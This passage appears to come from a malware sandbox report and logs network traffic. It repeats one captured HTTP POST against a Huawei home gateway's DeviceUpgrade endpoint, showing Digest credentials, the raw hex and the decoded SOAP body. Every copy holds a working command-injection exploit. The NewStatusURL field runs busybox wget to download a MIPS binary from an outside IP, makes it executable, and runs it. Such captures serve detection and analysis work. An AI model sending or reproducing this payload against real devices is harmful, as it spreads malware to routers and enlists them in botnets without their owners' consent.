37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
